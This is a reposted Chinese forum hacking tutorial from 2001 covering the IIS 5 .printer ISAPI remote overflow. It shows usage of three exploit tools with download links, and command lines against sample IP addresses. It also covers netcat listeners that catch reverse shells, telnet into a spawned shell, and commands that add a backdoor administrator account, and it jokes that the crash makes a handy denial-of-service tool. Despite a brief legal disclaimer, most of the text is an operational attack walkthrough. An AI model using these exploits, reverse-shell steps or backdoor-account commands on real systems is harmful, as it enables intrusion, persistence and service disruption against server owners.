IIS ISAPI Printer远程溢出攻击--2(作者:badboy)

gugu 2001-08-07 03:43:42
加精

本帖版权归原作者,其它媒体或网站转载请与e龙西祠胡同[http://www.xici.net]或原作者联系,并注明出处。
作者: yagami 发表日期: 2001-05-24 13:19:41 返回《黑客也是侠》 快速返回

IIS ISAPI Printer远程溢出攻击--2
—————————————————————————————————
badboy 坏男孩俱乐部
http://www.badclub.org/
badboyclub.163.net
badboyclub.go.163.com
这并不是什么权威教材,只适合菜鸟了解win9x、NT存在的不安全面,切莫
用此方法在国内做尝试,如果你偏要如此,那么由此引起的一切法律后果由
你自己负责。
本文只允许在网络任意转载,但须保留文章的完整性,如把本文作为经济目
的使用,或者未经本人许可进行印刷、光盘杂志、等出版性质的行为,本人
将保留侵权控告的权利。
本文内所谈到的程序具有一定的危害性,如果你安全技术能力有限,请勿测试。
—————————————————————————————————--
三、国产.printer远程溢出攻击软件使用实例
1、小榕的IIS5Exploit
严格地说,这软件并不是小榕写的,这软件是小榕根据jill.c改编优化部分代
码编译出来的。不过这软件确实很好,特别推荐大家使用。
下载地址http://www.netxeyes.com/IIS5Exploit.zip
压缩包里含有三个文件IIS5Exploit.exe、nc.exe、readme.txt
IIS5 .Printer Exploit 使用说明
-----------------以下是readme.txt的内容
本程序适用于英文版IIS 5.0
1、首先在本机用NC开一个监听端口。
C:\>nc -l -p 99
2、运行IIS5Exploit
D:\>jill xxx.xxx.xxx.xxx 211.152.188.1 333
===========IIS5 English Version .Printer Exploit.===========
===Written by Assassin 1995-2001. http://www.netxeyes.com===/
Connecting 211.152.188.1 ...OK.
Send Shell Code ...OK
IIS5 Shell Code Send OK
其中211.152.188.1指向本地IP。
稍等片刻,如果成功在本机NC监听的端口出现:
C:\>nc -l -p 99
Microsoft Windows 2000[Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
C:\>
可以执行命令。如:
C:\>net user hack password /add
The command completed successfully.
C:\>net localgroup administrartors hack /add
这样就创建了一个属于Administrator组的用户Hack,密码为password.
-----------------------------------------------------------------
使用说明解释:
使用这软件实际上要开两个MS-DOS窗口,首先运行nc -l -p 99 当然也可以
把端口定义为其他的,建议把开的端口改高些,避免在测试的同时恰好别人
在扫描你的端口,影响你正常的测试,小榕在写这说明时也许很急,写运行
运行IIS5Exploit也没写好,正确的是
IIS5Exploit 目标主机的IP 攻击者IP 99(要与自己NC开的端口一致)
为了攻击的成功率高,首先必须要明确所攻击的目标主机一定是开有
http\https服务的win2k。我们可以通过telnet目标主机的80端口get index.htm
来判断对方win2k的版本是不是Microsoft Windows 2000[Version 5.00.2195]
也可以用eyas提供的ScanPrinter来扫描获得。

2、sunx.org提供的iis5hack
下载地址http://www.sunx.org/mysoft/iis5hack.zip
运行参数
iis5hack <目标主机IP> <WEB端口80> <主机类型>

  中文WIN2K:      0
  中文WIN2K sp1:    1
  英文WIN2K:      2
  英文WIN2K, sp1:    3
  日文WIN2K:      4
  日文WIN2K, sp1:    5

E:\HACK\print>iis5hack 63.110.130.66 80 3
iis5 remote .printer overflow. writen by sunx
  http://www.sunx.org
  for test only, dont used to hack,
connecting...
sending...
Now you can telnet to 99 port
good luck

c:\telnet 63.110.130.66 99
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
已经进入目标主机,你想干什么就是你的事啦。该软件的优点是针对多种语
言版本的WIN2K系统,缺点,溢出成功后目标主机的IIS停止服务,并且得到
SHELL后要在较短时间内完成你想做的事,时间长的话连SHELL、IIS都会死
掉;不能随意定义目标主机的SHELL端口。
在退出TELNET服务时也一定要记住正常exit退出,否则目标主机的IIS也会死。
呵呵,我在测试过程中发现只是两三分钟时间对方的IIS就死了,看来把这软
件当做拒绝服务攻击型的软件也不错哦。

3、isno.yeah.net提供的cniis、iisx
isno最新的.printer漏洞攻击软件是iisx,是CNIIS的升级版本,按找作者的
使用说明我们可以看到:
使用方法: iisx <目标主机> <sp> <-p|-a|-r attackhost attackport>
   
     sp: 0 --- 目标没有安装SP , 1 --- 目标安装了SP1

提供三种对IIS5 .printer漏洞的攻击方式:
  
-p --- 对攻击目标运行iisx 66.77.88.99 0 -p
   在66.77.88.99上开一个端口7788,可以直接telnet 66.77.88.99 7788

-a --- 对攻击目标运行iisx 66.77.88.99 0 -a
   在66.77.88.99上添加一个管理员帐号:hax,其密码也为hax,
   可以使用net use \\66.77.88.99\ipc$ "hax" /user:"hax"建立连接。

-r --- 反向连接(类似于jill的方式),具体实施方法如下:

   例如先在一台机器111.222.333.444上运行nc -vv -l -p 5432,
   然后对攻击目标运行iisx 66.77.88.99 0 -r 111.222.33.444 5432,
   这时在111.222.333.444就会出现来自66.77.88.99的连接。
---------------------------------
对于该软件,我没有做他多的测试,不过我们可以看到,其第一种方法和SUNX的
IIS5HACK是一样的,只不过定制溢出的TELNET端口不同,对于固定溢出端口,我
总觉得不是那么好,至少在你测试的时候别人也在扫描相同的主机时,你的行为
就很容易被人发现。
对于第二种方法,只能攻击那些安全技术非常贫乏的网络管理员了,因为添加这
样一个密码和用户ID都一样的超级用户都能成功的话,对方也就很该死了,因为
那管理员连密码长字节和特殊字符化都不设定,那水平就可想而知了。
对于第三种攻击方法和jill.c差不多,所以也不再做详细介绍。

----------------------------------------------------------------------
(未完待续)



  流星的光芒虽短促,但天上还有什么星能比它更灿烂,辉煌? 
  当流星出现的时候,就算是永恒不变的星座,也夺不去它的光彩. 
  蝴蝶的生命是脆弱的甚至比鲜艳的花还脆弱. 
  可是它永远是活在春天里.它美丽,它自由,它飞翔. 
  它的生命虽短促却芬芳. 
  流星消逝的时候,光明己在望.黑暗无论多长,光明迟早总会来的. 
  
  
        有空去我们的站Patching Heroes   
           www.patching.net 
    计算机是一门只靠书本和自己上机就能掌握的技能 
黑客也是侠


--------------------------------------------------------------------------------


返回《黑客也是侠》 快速返回
...全文
165 1 打赏 收藏 转发到动态 举报
写回复
用AI写文章
1 条回复
切换为时间正序
请发表友善的回复…
发表回复
hcat1999 2001-08-08
  • 打赏
  • 举报
回复
hehe
gugu 辛苦了

9,505

社区成员

发帖
与我相关
我的任务
社区描述
Windows专区 安全技术/病毒
社区管理员
  • 安全技术/病毒社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧